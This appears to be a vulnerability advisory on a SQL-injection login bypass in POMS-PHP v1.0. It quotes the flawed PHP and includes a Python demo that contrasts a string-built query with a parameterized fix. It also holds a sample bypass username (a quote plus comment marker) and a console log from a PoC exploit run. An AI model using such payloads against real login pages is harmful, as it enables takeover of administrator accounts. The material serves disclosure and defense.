CVE-nu11-09

Vendor

Vulnerability Description:

POMS-PHP (by oretnom23) v1.0 is vulnerable to a remote SQL injection that bypasses authentication for the admin account in app/purchase_order/classes/Login.php. Background on SQL-injection authentication bypass: https://portswigger.net/support/using-sql-injection-to-bypass-authentication. The parameter (username) from the login form is not protected correctly: there is no validation or escaping of malicious payloads before it is placed in the query. When a user sends a malicious query or payload to the MySQL server, he can bypass the login credentials and take control of the admin account.

Vulnerability PHP code:

	public function login(){
		extract($_POST);   // $username and $password are taken straight from the request

		// Vulnerable: the raw username is concatenated into the SQL text, so it can change the query's structure
		$qry = $this->conn->query("SELECT * from users where username = '$username' and password = md5('$password') ");
		if($qry->num_rows > 0){
			foreach($qry->fetch_array() as $k => $v){
				if(!is_numeric($k) && $k != 'password'){
					$this->settings->set_userdata($k,$v);
				}

			}
			$this->settings->set_userdata('login_type',1);
			return json_encode(array('status'=>'success'));
		}else{
			// The failed query text (with the user input) is echoed back to the client
			return json_encode(array('status'=>'incorrect','last_qry'=>"SELECT * from users where username = '$username' and password = md5('$password') "));
		}
	}
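The defect above is the string-built query; the fix is to bind the user input as a parameter so it can never alter the SQL structure. The following added example (not code from POMS-PHP or its author) reproduces the pattern in Python against an in-memory SQLite table and places it beside the parameterized form. The table layout, the sample account and the crafted username are all constructed for the demonstration; md5 is kept only to mirror the page's schema.

```python
import hashlib
import sqlite3


def md5_hex(s: str) -> str:
    """Mirror the md5() the page's query applies to the password (weak; see note below)."""
    return hashlib.md5(s.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    """Constructed sample users table with one admin account (assumption, not the project's schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        ("admin", md5_hex("correct-horse")),
    )
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Same construction as Login.php: input spliced into the SQL text."""
    qry = (
        f"SELECT * FROM users WHERE username = '{username}' "
        f"AND password = '{md5_hex(password)}'"
    )
    return conn.execute(qry).fetchone() is not None


def login_fixed(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Parameterized query: the driver sends the values separately, so quotes
    or comment markers in the username are just characters to compare against."""
    qry = "SELECT * FROM users WHERE username = ? AND password = ?"
    return conn.execute(qry, (username, md5_hex(password))).fetchone() is not None


def compare(username: str, password: str) -> dict:
    """Run the same credentials through both versions and report the outcome."""
    conn = make_db()
    return {
        "vulnerable": login_vulnerable(conn, username, password),
        "fixed": login_fixed(conn, username, password),
    }


if __name__ == "__main__":
    # Constructed inputs: a valid login, a wrong password, and a username that
    # carries a quote and a comment marker so the rest of the query is dropped.
    for creds in [("admin", "correct-horse"), ("admin", "wrong"), ("admin' -- ", "wrong")]:
        print(creds, "->", compare(*creds))
```

The parameterized version is the change to make in Login.php (mysqli prepared statements or PDO with bound parameters). Two further points follow from the page's own code: md5 is not a password hash and should be replaced by password_hash()/password_verify(), and the failed query text should not be returned to the client in the 'last_qry' field, since it confirms to an attacker exactly how their input landed in the SQL.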

Responding from the hacked target:

      • PoC + checks = PoC-CVE-nu11-09-rfth.py
C:\Users\venvaropt\Desktop\CVE-nu11-09-09092021>python PoC-CVE-nu11-09.py

DevTools listening on ws://127.0.0.1:63704/devtools/browser/bf18be59-2361-4c08-82dc-689957d5bf9e

The payload for CVE-nu11-09 is deployed and your admin account is PWNED by SQL - Injection

Please see the screenshot poc.png to see if your exploit is working =) BR @nu11secur1ty

This target gives a positive <Response [200]> from inside, after bypassing the login :D

C:\Users\venvaropt\Desktop\CVE-nu11-09-09092021>

Exploit technique:

Python + Selenium + hidden login && screenshot

Proof:

(screenshot: poc.png)

BR

      • @nu11secur1ty